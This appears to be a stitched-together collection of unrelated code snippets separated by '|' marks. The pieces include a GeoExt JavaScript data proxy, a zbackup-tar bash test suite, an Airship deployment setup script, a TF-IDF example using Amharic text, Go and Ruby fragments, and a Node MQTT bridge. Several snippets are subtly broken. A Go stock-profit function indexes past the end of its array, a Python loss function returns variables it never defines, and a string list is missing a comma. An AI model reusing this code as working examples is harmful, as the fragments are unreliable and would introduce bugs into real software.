check egrep -q 'xPuzzle.jpg.pagespeed.+srcset="([^ ]*images/([0-9]+x[0-9]+)?xPuzzle.jpg.pagespeed.ic.[0-9a-zA-Z_-]+.jpg [0-9.]+x,?)+"' $FETCH_FILE
start_test rewrite_images can rewrite srcset itself
URL=$TEST_ROOT/image_rewriting/srcset.html?PageSpeedFilters=+rewrite_images,+debug
fetch_until -save $URL 'grep -c xPuzzle.*1x.*xCuppa.*2x' 1
|
import tweepy
# Set up API access for your application
consumer_key = "<your_consumer_key>"
consumer_secret = "<your_consumer_secret>"
access_token = "<your_access_token>"
access_token_secret = "<your_access_token_secret>"
# Create the API access object
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
# Get the user's timeline
user_timeline = api.user_timeline('username', count=5)
# Print each tweet
for tweet in user_timeline:
print(tweet.text) |
<reponame>KaiVolland/geoext2<filename>src/GeoExt/data/proxy/Protocol.js<gh_stars>0
/*
* Copyright (c) 2008-2015 The Open Source Geospatial Foundation
*
* Published under the BSD license.
* See https://github.com/geoext/geoext2/blob/master/license.txt for the full
* text of the license.
*/
/*
* @requires GeoExt/Version.js
*/
/**
* A data proxy for use with OpenLayers.Protocol objects.
*
* @class GeoExt.data.proxy.Protocol
*/
Ext.define('GeoExt.data.proxy.Protocol', {
extend: 'Ext.data.proxy.Server',
requires: [
'GeoExt.Version'
],
alias: 'proxy.gx_protocol',
config: {
/**
* The protocol used to fetch features.
*
* @cfg {OpenLayers.Protocol}
*/
protocol: null,
/**
* Abort any previous request before issuing another.
*
* @cfg {Boolean}
*/
abortPrevious: true,
/**
* Should options.params be set directly on options before passing it
* into the protocol's read method?
*
* @cfg {Boolean}
*/
setParamsAsOptions: false,
/**
* The reader to use.
*
* @cfg {Ext.data.reader.Reader}
*/
reader: {}
},
/**
* We need to override this as the OpenLayers classes passed as configs
* loose their class-nature and seem to be copied by ExtJS somewhere.
*
* We deal with this elsewhere in a different manner and should see if
* we can either share code or get rid of this special handling all
* together. The problem isn't reproducible for other 'classes' with a
* similar inheritance strategy as OpenLayers 2 has.
*
* TODO Find a way to have this functionality shared or get rid of it.
*
* @param {Object} config the configuration as passed by the user.
*/
initConfig: function(config){
var me = this,
cfg = config || {},
prefix = me.$configPrefixed ? '_' : '',
olConfigs = [
'protocol'
];
Ext.each(olConfigs, function(olConfig){
if (cfg[olConfig]) {
me[prefix + olConfig] = cfg[olConfig];
delete cfg[olConfig];
}
});
me.callParent([cfg]);
},
model: 'Ext.data.Model',
/**
* The response returned by the read call on the protocol.
*
* @property {OpenLayers.Protocol.Response}
* @private
*/
response: null,
/**
* Send the request.
*
* @param {Ext.data.Operation} operation The Ext.data.Operation object.
* @param {Function} callback The callback function to call when the
* operation has completed.
* @param {Object} scope The scope in which to execute the callback.
* @private
*/
doRequest: function(operation, callback, scope) {
var me = this,
operationParams,
params,
request,
o,
cb,
options;
if(GeoExt.isExt5){
callback = callback || operation.getCallback();
scope = scope || operation.getScope();
operationParams = operation.getParams() || {};
} else {
operationParams = operation.params || {};
}
params = Ext.applyIf(operationParams, me.extraParams || {});
//copy any sorters, filters etc into the params so they can be sent over
//the wire
params = Ext.applyIf(params, me.getParams(operation));
o = {
params: params || {},
operation: operation,
request: {
callback: callback,
scope: scope,
arg: operation.arg || operation.config.arg
},
reader: me.getReader()
};
cb = OpenLayers.Function.bind(me.loadResponse, me, o);
if (me.getAbortPrevious()) {
me.abortRequest();
}
options = {
params: params,
callback: cb,
scope: me
};
Ext.applyIf(options, operation.arg || operation.config.arg);
if (me.getSetParamsAsOptions() === true) {
Ext.applyIf(options, options.params);
delete options.params;
}
me.response = me.getProtocol().read(options);
},
/**
* Called to abort any ongoing request.
*
* @private
*/
abortRequest: function() {
var me = this;
if (me.response) {
me.getProtocol().abort(me.response);
me.response = null;
}
},
/**
* Handle response from the protocol.
*
* @param {Object} o
* @param {OpenLayers.Protocol.Response} response
* @private
*/
loadResponse: function(o, response) {
var me = this,
operation = o.operation,
scope = o.request.scope,
callback = o.request.callback,
result;
if (response.success()) {
result = o.reader.read(response.features || response);
Ext.apply(operation, {
response: response,
resultSet: result
});
if (GeoExt.isExt4) {
operation.commitRecords(result.records);
} else {
operation.setRecords(result.records);
}
operation.setCompleted();
operation.setSuccessful();
} else {
me.setException(operation, response);
me.fireEvent('exception', this, response, operation);
}
if (typeof callback == 'function') {
callback.call(scope || me, operation);
}
}
});
|
#!/bin/bash
#
# Ensure zbackup-tar is in your path:
# export PATH=$PATH:/home/david/Projects/zbackup-tar
#
# Usage:
# test.sh /home/david/Projects/zbackup-tar/tests/testdata
SCRIPTNAME=`readlink -f $0`
export FUNCTIONROOT=`dirname $SCRIPTNAME`
export TMPDIR=/tmp/zbackup-tar/
export TESTDATA=$1
REFRESHCYCLES=5
TODO_BUG=1
source $FUNCTIONROOT/test_Functions.sh
function test1 ()
{
logResult "######## Backup 1 - Initial Backup ########"
backupAndRestoreDir "" backup01.tar
sleepAvoidCollision
}
function test1Encrypted ()
{
logResult "######## Backup 1 Encrypted - Encrypted backups ########"
echo mypassword > $TMPDIR/password
zbackup init --password-file $TMPDIR/password $TMPDIR/zbackup_encrypted/
zbackup-tar create --zbackupArgs "--password-file $TMPDIR/password" --previousBackup "" --newBackup $TMPDIR/zbackup_encrypted/backups/backup01.tar $TESTDATA/
checkForSuccess "SUCCESS $BACKUPNAME backed up" "FAIL zbackup-tar failed"
cd $TMPDIR/restored/
rm -rf $TMPDIR/restored/*
zbackup-tar restore --zbackupArgs "--password-file $TMPDIR/password" --backup $TMPDIR/zbackup_encrypted/backups/backup01.tar
checkForSuccess "SUCCESS $BACKUPNAME restored" "FAIL zbackup-tar restore failed"
diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
checkForSuccess "SUCCESS $BACKUPNAME is the same" "FAIL Restoring $BACKUPNAME"
}
function test1SameDir ()
{
logResult "######## Backup 1 - Same Dir ########"
BACKUPNAME=backup01_samedir.tar
cd $TESTDATA/
echo "I am now in " `pwd`
zbackup-tar create --previousBackup "" --newBackup $TMPDIR/zbackup/backups/$BACKUPNAME .
checkForSuccess "SUCCESS $BACKUPNAME backed up" "FAIL zbackup-tar failed"
cd $TMPDIR/restored/
rm -rf $TMPDIR/restored/*
zbackup-tar restore --backup $TMPDIR/zbackup/backups/$BACKUPNAME
checkForSuccess "SUCCESS $BACKUPNAME restored" "FAIL zbackup-tar restore failed"
restoreAndCheck
sleepAvoidCollision
}
function test2 ()
{
logResult "######## Backup 2 - No Changes ########"
export REFRESHCYCLES=0
backupAndRestoreDir backup01.tar backup02.tar
export REFRESHCYCLES=5
diff <(tail -n +2 /tmp/backup01.tar.manifest) <(tail -n +2 /tmp/backup02.tar.manifest)
checkForSuccess "SUCCESS Backup manifest 1 and 2 are identical" "FAIL manifest 1 and 2 are different"
sleepAvoidCollision
}
function test3 ()
{
logResult "######## Backup 3 - A New File ########"
date > $TESTDATA/file.txt
backupAndRestoreDir backup02.tar backup03.tar
sleepAvoidCollision
}
function test4 ()
{
logResult "######## Backup 4 - Changed Files ########"
date > $TESTDATA/file.txt
date > $TESTDATA/folder2/file.txt
backupAndRestoreDir backup03.tar backup04.tar
sleepAvoidCollision
}
function test5 ()
{
logResult "######## Backup 5 - Removed Files ########"
find $TESTDATA -name "*.txt" -print0 | xargs -0 rm -v
backupAndRestoreDir backup04.tar backup05.tar
sleepAvoidCollision
}
function test5b ()
{
logResult "######## Backup 5b - File permissions ########"
fakeroot -u $FUNCTIONROOT//test_Fakeroot.sh
diff /tmp/test5b.testdata.perms /tmp/test5b.restored.perms
checkForSuccess "SUCCESS Permissions match" "FAIL Permissions do not match"
sleepAvoidCollision
}
function test6 ()
{
logResult "######## Test 6 - Moving the backup ########"
export BACKUP=06
backupAndRestoreDir backup05b.tar backup$BACKUP.tar
mkdir -pv $TMPDIR/foo/bar/
mv $TMPDIR/zbackup $TMPDIR/foo/bar/
echo Restore backup $BACKUP
cd $TMPDIR/restored/
zbackup-tar restore --backup $TMPDIR/foo/bar/zbackup/backups/backup$BACKUP.tar
echo Checking backup $BACKUP
diff -rq $TESTDATA/ $TMPDIR/restored/
checkForSuccess "SUCCESS $BACKUP is the same" "FAIL $BACKUP is differente"
mv $TMPDIR/foo/bar/zbackup $TMPDIR/
sleepAvoidCollision
}
function test7 ()
{
logResult "######## Test 7 - Handling errors ########"
export BACKUP=07
backupAndRestoreDir backup06.tar backup$BACKUP.tar
chmod gou-rwx /tmp/zbackup-tar/zbackup/index/
echo Restore backup $BACKUP AFTER remiving permissions
cd $TMPDIR/restored/
zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar
checkForFailure "FAIL - backup should have FAILED $BACKUP" "SUCCESS Restoring the backup returned a non-0 error code"
chmod --reference=/tmp/zbackup-tar/zbackup/bundles /tmp/zbackup-tar/zbackup/index/
sleepAvoidCollision
}
function test8 ()
{
logResult "######## Backup 8 - Add txt files ########"
date > $TESTDATA/file.txt
date > $TESTDATA/folder2/file.txt
backupAndRestoreDir backup07.tar backup08.tar
sleepAvoidCollision
}
function test9 ()
{
logResult "######## Backup 9 - Exclude txt files ########"
export BACKUP=09
rm -rf $TMPDIR/restored/*
date > $TESTDATA/file.txt
echo Initial backup $BACKUP
zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup08.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 --exclude "*.txt" $TESTDATA/
echo Restore backup $BACKUP
cd $TMPDIR/restored/
zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar
zbackup restore --silent $TMPDIR/zbackup/backups/backup$BACKUP.tar.manifest > /tmp/backup$BACKUP.tar.manifest
echo Checking backup $BACKUP
diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
checkForFailure "FAIL txt files should be different" "SUCCESS backup $BACKUP is different"
find $TESTDATA/ -name "*.txt" -print0 | xargs -0 rm -v
diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
checkForSuccess "SUCCESS After removing txt files, backup should be the same" "FAIL backup files were different"
sleepAvoidCollision
}
function test9b ()
{
logResult "######## Backup 9b - Exclude multiple extensions ########"
export BACKUP=09b
rm -rf $TMPDIR/restored/*
mkdir -v $TESTDATA/excludedir/
date > $TESTDATA/file.txt
date > $TESTDATA/file.exclude
date > $TESTDATA/excludedir/test.sh
echo Initial backup $BACKUP
zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup08.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 --exclude "*.txt" --exclude "*.exclude" --exclude "excludedir/" $TESTDATA/
echo Restore backup $BACKUP
cd $TMPDIR/restored/
zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar
zbackup restore --silent $TMPDIR/zbackup/backups/backup$BACKUP.tar.manifest > /tmp/backup$BACKUP.tar.manifest
echo Checking backup $BACKUP
diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
checkForFailure "FAIL txt files should be different" "SUCCESS backup $BACKUP is different"
find $TESTDATA/ -name "*.txt" -print0 | xargs -0 rm -v
find $TESTDATA/ -name "*.exclude" -print0 | xargs -0 rm -v
find $TESTDATA/ -name "excludedir" -print0 | xargs -0 rm -rfv
diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
checkForSuccess "SUCCESS After removing txt and ,v and subdir1/, backup should be the same" "FAIL backup files were different"
sleepAvoidCollision
}
function test10 ()
{
logResult "######## Backup 10 - Exclude subfolder1/ files ########"
export BACKUP=10
rm -rf $TMPDIR/restored/*
echo Initial backup $BACKUP
zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup09.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 --exclude "subfolder1/" $TESTDATA/
echo Restore backup $BACKUP
cd $TMPDIR/restored/
zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar
zbackup restore --silent $TMPDIR/zbackup/backups/backup$BACKUP.tar.manifest > /tmp/backup$BACKUP.tar.manifest
echo Checking backup $BACKUP
diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/ > /tmp/backup$BACKUP.diff
checkForFailure "FAIL txt files should be different" "SUCCESS backup $BACKUP is different"
grep -v subfolder1 /tmp/backup$BACKUP.diff
checkForFailure "FAIL There should be no lines not matching subfolder1/" "SUCCESS backup is the same after excluding subfolder1/"
sleepAvoidCollision
}
function test11 ()
{
logResult "######## Test 11 - Handling errors backing up ########"
export BACKUP=11
chmod gou-rwx /tmp/zbackup-tar/zbackup/index/
zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup10.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 $TESTDATA/
checkForFailure "FAIL - backup should have FAILED $BACKUP" "SUCCESS Storing the backup returned a non-0 error code"
chmod --reference=/tmp/zbackup-tar/zbackup/bundles /tmp/zbackup-tar/zbackup/index/
zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup10.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 $TESTDATA/
checkForSuccess "SUCCESS - backup should have SUCCEEDED $BACKUP" "FAIL Backing up returned a non-0 error code"
sleepAvoidCollision
}
function test12 ()
{
logResult "######## Test 12 - Ensuring backup output ########"
export BACKUP=12
date > $TESTDATA/file.txt
date > $TESTDATA/folder2/file.txt
touch $TESTDATA/document.pdf
# Extend maxAge so we don't freshen any files
zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup11.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar $TESTDATA/ > /tmp/backup$BACKUP.stdout
diff -w /tmp/backup$BACKUP.stdout $TESTDATA/../results/backup$BACKUP.stdout
checkForSuccess "SUCCESS - Output should be the same $BACKUP" "FAILURE Output is not the same as the sample"
sleepAvoidCollision
}
# Expected output is:
# fileX EXTRACTED from backups/blah.tar
# fileY EXTRACTED from backups/blahX.tar
# where backupNN.tar is the tar file where the file resides.
# The files are listed on the order they are extracted, so they should be listed clustered by tarfile and then in the order they were tarred
function test13 ()
{
logResult "######## Test 13 - Ensuring restore output ########"
export BACKUP=13
backupAndRestoreDir backup12.tar backup13.tar
cd $TMPDIR/restored/
rm -rf $TMPDIR/restored/*
zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar > /tmp/backup$BACKUP.stdout
# Sort the output of the command by filename, since the output is NOT sorted
sort /tmp/backup$BACKUP.stdout | sed -e "s/backup[0-9][0-9].tar/backupNN.tar/g" > /tmp/backup$BACKUP.stdout.massaged
diff -w /tmp/backup$BACKUP.stdout.massaged $TESTDATA/../results/backup$BACKUP.stdout
checkForSuccess "SUCCESS - Output should be the same $BACKUP" "FAILURE Output is not the same as the sample"
sleepAvoidCollision
}
function test14 ()
{
logResult "######## Test 14 - Partial restores - directories ########"
export BACKUP=14
backupAndRestoreDir backup13.tar backup$BACKUP.tar
cd $TMPDIR/restored/
rm -rf $TMPDIR/restored/*
zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar folder1/
diff -rq --no-dereference $TESTDATA/folder1/ $TMPDIR/restored/folder1/
checkForSuccess "SUCCESS - folder1 is the same" "FAILURE folder1 is different"
if [ -d "$TMPDIR/restored/folder2" ]; then
logFailResult "FAIL folder2 should not have been restored"
exit 1
else
logResult "SUCCESS folder2 was not restored"
fi
sleepAvoidCollision
}
function test15 ()
{
logResult "######## Test 15 - Partial restores - files ########"
export BACKUP=15
backupAndRestoreDir backup14.tar backup$BACKUP.tar
cd $TMPDIR/restored/
rm -rf $TMPDIR/restored/*
zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar file.txt
find -type f | sort > /tmp/backup$BACKUP.list
diff -wB /tmp/backup$BACKUP.list $TESTDATA/../results/backup$BACKUP.list
checkForSuccess "SUCCESS - files are the same" "FAILURE files are different"
sleepAvoidCollision
}
function test16 ()
{
logResult "######## Test 16 - links (broken and working) ########"
export BACKUP=16
ln -sT /dev/broken $TESTDATA/broken.link
ln -sT /etc/init.d $TESTDATA/initd.link
backupAndRestoreDir backup15.tar backup$BACKUP.tar
find $TESTDATA -name "*.link" -print0 | xargs -0 rm -v
sleepAvoidCollision
}
function testSleep ()
{
PREVBACKUP=$1
BACKUP=$2
logResult "######## Backup $BACKUP / $PREVBACKUP - Sleep for 1 mins ########"
longSleep 60 "To freshen files"
backupAndRestoreDir backup$PREVBACKUP.tar backup$BACKUP.tar
diff /tmp/backup$PREVBACKUP.tar.manifest /tmp/backup$BACKUP.tar.manifest
checkForFailure "FAIL Manifests are identical, should have been reloaded" "SUCCESS Manifest has changed"
sleepAvoidCollision
}
echo Executing Unit Tests in $FUNCTIONROOT
find $TESTDATA -name "*.txt" -print0 | xargs -0 rm -v
find $TESTDATA -name "*.link" -print0 | xargs -0 rm -v
mkdir -v $TESTDATA/empty
chmod --reference=/tmp/zbackup-tar/zbackup/bundles /tmp/zbackup-tar/zbackup/index/
rm -rf $TMPDIR
mkdir -pv $TMPDIR/zbackup $TMPDIR/restored
zbackup init --non-encrypted $TMPDIR/zbackup/
test1
test1SameDir
test1Encrypted
test2
test3
test4
test5
test5b
test6
test7
test8
test9
test9b
test10
test11
test12
test13
test14
test15
test16
LASTTEST=16
for i in `seq 1 3`; do
PREVBACKUP=$((LASTTEST + i - 1))
BACKUP=$((LASTTEST + i))
testSleep $PREVBACKUP $BACKUP
done;
grep backup01 /tmp/backup$BACKUP.tar.manifest
checkForFailure "FAIL backup01 is in use" "SUCCESS backup01 is no longer in use"
find $TESTDATA -name "*.txt" -print0 | xargs -0 rm -v
|
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/1024+0+512-rare/model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/1024+0+512-rare/512+512+512-shuffled-N-1 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function shuffle_remove_all_but_nouns_first_third_full --eval_function last_element_eval |
<filename>ruby/spec/ruby/core/float/floor_spec.rb
require File.expand_path('../../../spec_helper', __FILE__)
describe "Float#floor" do
it "returns the largest Integer less than or equal to self" do
-1.2.floor.should eql( -2)
-1.0.floor.should eql( -1)
0.0.floor.should eql( 0 )
1.0.floor.should eql( 1 )
5.9.floor.should eql( 5 )
-9223372036854775808.1.floor.should eql(-9223372036854775808)
+9223372036854775808.1.floor.should eql(+9223372036854775808)
end
ruby_version_is "2.4" do
it "returns the largest number less than or equal to self with an optionally given precision" do
2.1679.floor(0).should eql(2)
214.94.floor(-1).should eql(210)
7.0.floor(1).should eql(7.0)
-1.234.floor(2).should eql(-1.24)
5.123812.floor(4).should eql(5.1238)
end
end
end
|
import pandas as pd
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
# this is a very toy example, do not try this at home unless you want to understand the usage differences
docs1 = ["the house had a tiny little mouse",
"the cat saw the mouse",
"the mouse ran away from the house",
"the cat finally ate the mouse",
"the end of the mouse story"
]
docs2 = ["የኢትዮጵያ ቤት ኪንግ ፕሪሚዬር ሊግ አሸናፊው ፋሲል ከነማ ትናንት በአዲስ አበባ ሸራተን አዲስ ሆቴል የገቢ ማሰባሰቢያ ቴሌቶን ማዘጋጀቱ ይታወሳል",
"በገቢ ማሰባሰቢያ ዝግጅቱ ከፍተኛ የመንግሥት የሥራ ኃላፊዎችን ጨምሮ የተለያዩ የኅብረተሰብ ክፍሎች ተሳትፈዋል፡፡ ስለ ተደረገው የገቢ ማሰባሰቢያ ቴሌቶን መግለጫ የሰጡት የክለቡ ፕሬዚዳንትና የጎንደር ከተማ ከንቲባ አቶ ሞላ መልካሙ ቴሌቶኑ ኢትዮጵያዊነት አምሮና ደምቆ የታየበትና የስፖርት ዓላማን ያሳካ ነበር ብለዋል",
"በቴሌቶኑ አሁንም በስልክና በተለያዩ አማራጮች ቃል የሚገቡ እንዳሉ ሆኖ ከ170 ሚሊዮን ብር በላይ መሰብሰቡም ተገልጿል"
"ቀዳማዊት እመቤት ዝናሽ ታያቸው በሁሉም ክልሎች የክለቡ አምባሳደሮች መሰየማቸው ፋሲል ከነማ የኢትዮጵያ ክለብ መሆኑን የሚገልጽ ነው ብለዋል። በቴሌቶኑ ከሁሉም የኢትዮጵያ ክፍሎች ድጋፎች መደረጋቸው ሌላኛው ፍሲል የኢትዮጵያ ክለብ መሆኑን የሚያሳይ እንደሆነ ተናግረዋል። በድጋፉ ለተሳተፉ ሁሉም አካላት ምስጋናም አቅርበዋል",
"በቀጣይ ክለቡ የያዛቸውን ትላልቅ ፕሮጀክቶች ከግብ ለማድረስና ክለቡ በአፍሪካ መድረክ ረዥም ርቀት እንዲጓዝ አሁንም የሁሉም ድጋፍ ያስፈልጋል ተብሏል።",
"የክለቡ ሥራ አስኪያጅ አቶ አቢዮት ብርሃኑ ክለቡ በቀጣይ ከመንግሥት በጀት ተላቆ የራሱ ቋሚ ሀብት እንዲኖረው ሥራዎች በእቅድ እየተሠሩ ስለመሆናቸው ተናግረዋል",
"ከቴሌቶኑ የሚገኘው ገቢ ለደሞዝና ለእለታዊ ወጭዎች ሳይሆን አካዳሚ መገንባት ጨምሮ ለተያያዙት ትላልቅ ፕሮጀክቶች እንደሚውልም ተጠቅሷል"
]
# instantiate CountVectorizer()
cv = CountVectorizer()
# this steps generates word counts for the words in your docs
word_count_vector = cv.fit_transform(docs2)
wcv = word_count_vector.shape
print(wcv)
tfidf_transformer=TfidfTransformer(smooth_idf=True,use_idf=True)
tfidf_transformer.fit(word_count_vector)
# print idf values
df_idf = pd.DataFrame(tfidf_transformer.idf_, index=cv.get_feature_names(), columns=["idf_weights"])
# sort ascending
sa = df_idf.sort_values(by=['idf_weights'])
# count matrix
count_vector = cv.transform(docs2)
# tf-idf scores
tf_idf_vector = tfidf_transformer.transform(count_vector)
print(sa)
print("###############")
print(tf_idf_vector)
print("%%%%%%%%%%")
feature_names = cv.get_feature_names()
# get tfidf vector for first document
first_document_vector = tf_idf_vector[0]
# print the scores
df = pd.DataFrame(first_document_vector.T.todense(), index=feature_names, columns=["tfidf"])
df.sort_values(by=["tfidf"], ascending=False)
print(df) |
package parser
type String struct {
typeBase
}
func (t *String) Name() string {
return "string"
}
func (t *String) Layout() string {
return "string"
}
func (t *String) Tag() byte {
return tagString
}
func (t *String) IsBase() bool {
return true
}
func (t *String) BeKey() bool {
return true
}
func (t *String) BeArr() bool {
return true
}
func (t *String) BeEnum() bool {
return false
}
func (t *String) Parse(sheet *Sheet, s string) error {
return nil
}
func (t *String) Value(sheet *Sheet, s string) (interface{}, error) {
return s, nil
}
func (t *String) Valid() string {
return ""
}
func (t *String) Zero() interface{} {
return ""
}
func (t *String) Marshal(v interface{}) ([]byte, error) {
return marshalString(v.(string), t.Tag())
}
func (t *String) Reader() IType {
return t
}
|
export const FormatsData: {[k: string]: ModdedSpeciesFormatsData} = {
extremeribbit: {
tier: "OU",
doublesTier: "DOU",
},
}; |
#!/usr/bin/env bash
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -xe
export ISO_DIR=${ISO_DIR:-"/srv/iso"}
export SERVE_PORT=${SERVE_PORT:-"8099"}
export AIRSHIPCTL_WS=${AIRSHIPCTL_WS:-$PWD}
export USER_NAME=${USER:-"ubuntu"}
export USE_PROXY=${USE_PROXY:-"false"}
export HTTPS_PROXY=${HTTPS_PROXY:-${https_proxy}}
export HTTP_PROXY=${HTTP_PROXY:-${http_proxy}}
export NO_PROXY=${NO_PROXY:-${no_proxy}}
export AIRSHIP_CONFIG_ISO_GEN_TARGET_PATH=${ISO_DIR}
export AIRSHIP_CONFIG_ISO_BUILDER_DOCKER_IMAGE=${BUILDER_IMAGE:-"quay.io/airshipit/isogen:latest-ubuntu_focal"}
export REMOTE_TYPE=redfish
export REMOTE_INSECURE=true
export REMOTE_PROXY=false
export AIRSHIP_CONFIG_ISO_SERVE_HOST=${HOST:-"localhost"}
export AIRSHIP_CONFIG_ISO_PORT=${SERVE_PORT}
export AIRSHIP_CONFIG_ISO_NAME=${ISO_NAME:-"ubuntu-focal.iso"}
export SYSTEM_ACTION_RETRIES=30
export SYSTEM_REBOOT_DELAY=30
export AIRSHIP_CONFIG_PRIMARY_REPO_BRANCH=${BRANCH:-"master"}
# the git repo url or local file system path to a cloned repo, e.g., /home/stack/airshipctl
export AIRSHIP_CONFIG_PRIMARY_REPO_URL=${REPO:-"https://review.opendev.org/airship/airshipctl"}
export AIRSHIP_SITE_NAME=${AIRSHIP_SITE_NAME:-"manifests/site/test-site"}
export AIRSHIP_CONFIG_MANIFEST_DIRECTORY=${AIRSHIP_CONFIG_MANIFEST_DIRECTORY:-"/tmp/airship"}
export AIRSHIP_CONFIG_CA_DATA=$(cat tools/deployment/certificates/airship_config_ca_data| base64 -w0)
export AIRSHIP_CONFIG_EPHEMERAL_IP=${IP_Ephemeral:-"10.23.25.101"}
export AIRSHIP_CONFIG_CLIENT_CERT_DATA=$(cat tools/deployment/certificates/airship_config_client_cert_data| base64 -w0)
export AIRSHIP_CONFIG_CLIENT_KEY_DATA=$(cat tools/deployment/certificates/airship_config_client_key_data| base64 -w0)
# Remove the contents of the .airship folder, preserving the kustomize plugin directory
rm -rf $HOME/.airship/*config*
mkdir -p $HOME/.airship
echo "Generate ~/.airship/config and ~/.airship/kubeconfig"
envsubst <"${AIRSHIPCTL_WS}/tools/deployment/templates/airshipconfig_template" > ~/.airship/config
envsubst <"${AIRSHIPCTL_WS}/tools/deployment/templates/kubeconfig_template" > ~/.airship/kubeconfig
if ! airshipctl config get-cluster | grep -q 'dummycluster_ephemeral' ; then
echo "Unable to verify the ephemeral cluster details. Please verify the ephemeral cluster configuration."
else
echo "Verify airshipctl configuration"
airshipctl config get-cluster
fi
|
//
// Copyright (C) 2018 <NAME>
//
// @@ All Rights Reserved @@
// This file is part of the RDKit.
// The contents are covered by the terms of the BSD license
// which is included in the file license.txt, found at the root
// of the RDKit source tree.
//
#include <RDGeneral/export.h>
#ifndef __RD_TAUTOMER_CATALOG_UTILS_H__
#define __RD_TAUTOMER_CATALOG_UTILS_H__
#include <GraphMol/RDKitBase.h>
#include "TautomerCatalogParams.h"
#include <GraphMol/Substruct/SubstructMatch.h>
#include <GraphMol/ChemReactions/Reaction.h>
#include <GraphMol/Bond.h>
#include <iostream>
namespace RDKit {
class ROMol;
namespace MolStandardize {
class TautomerCatalogParams;
// typedef enum {
// SINGLE,
// DOUBLE,
// TRIPLE,
// AROMATIC,
//} BondType;
// typedef std::vector<ROMol*, std::string, std::string> tautomerTransform;
class RDKIT_MOLSTANDARDIZE_EXPORT TautomerTransform {
public:
ROMol* Mol;
std::vector<Bond::BondType> BondTypes;
std::vector<int> Charges;
TautomerTransform(ROMol* mol, const std::vector<Bond::BondType>& bondtypes,
const std::vector<int>& charges)
: Mol(mol), BondTypes(bondtypes), Charges(charges) {}
TautomerTransform(const TautomerTransform& other)
: BondTypes(other.BondTypes), Charges(other.Charges) {
Mol = new ROMol(*other.Mol);
}
TautomerTransform& operator=(const TautomerTransform& other) {
if (this != &other) {
Mol = new ROMol(*other.Mol);
BondTypes = other.BondTypes;
Charges = other.Charges;
}
return *this;
};
~TautomerTransform() { delete Mol; }
};
RDKIT_MOLSTANDARDIZE_EXPORT std::vector<Bond::BondType> stringToBondType(
std::string bond_str);
RDKIT_MOLSTANDARDIZE_EXPORT std::vector<int> stringToCharge(
std::string charge_str);
RDKIT_MOLSTANDARDIZE_EXPORT std::vector<TautomerTransform> readTautomers(
std::string fileName);
RDKIT_MOLSTANDARDIZE_EXPORT std::vector<TautomerTransform> readTautomers(
std::istream& inStream, int nToRead = -1);
} // namespace MolStandardize
} // namespace RDKit
#endif
|
<filename>__tests__/shared/actions/index.js
/**
* Actions testing.
*/
import actions from 'actions';
test('Exports expected actions',
() => expect(actions).toMatchSnapshot());
|
package problems
import "math"
type (
// stockPrices is an array of stock prices at time i
stockPrices []int
)
func (in stockPrices) maxProfit() int {
n := len(in)
if n < 2 {
return 0
}
dp := make([]int, n)
dp[0] = 0
min := math.MaxInt32
for i := 1; i < len(in); i++ {
if in[i-1] < min {
min = in[i-1]
}
dp[i] = dp[i-1]
if in[i]-min > dp[i] {
dp[i] = in[i] - min
}
}
return dp[n]
}
|
def loss(cls_scores, bbox_preds, gt_bboxes, gt_labels, img_metas, gt_bboxes_ignore):
# Implement the loss function to calculate class and bounding box losses
# Your implementation may involve using specific loss functions such as cross-entropy for classification and smooth L1 loss for bounding box regression.
# Calculate class loss
# Example: cls_loss = cross_entropy_loss(cls_scores, gt_labels)
# Calculate bounding box regression loss
# Example: box_loss = smooth_l1_loss(bbox_preds, gt_bboxes)
# Create a dictionary to store the losses
losses = {
'loss_cls': cls_loss,
'loss_bbox': box_loss
}
return losses |
from uvicore.contracts import Binding as BindingInterface
class Binding(BindingInterface):
pass
|
<filename>services/pusher.js
var sys = require('util');
var net = require('net');
var mqtt = require('mqtt');
var io = require('socket.io').listen(4000);
var client = mqtt.connect('mqtt://172.16.31.10');
io.sockets.on('connection',function (socket) {
socket.on('subscribe',function (data) {
console.log('Subscribing to: '+data.topic);
client.subscribe(data.topic);
});
socket.on('publish',function(data){
console.log('Publishing: '+data.payload);
client.publish(data.topic,data.payload);
});
});
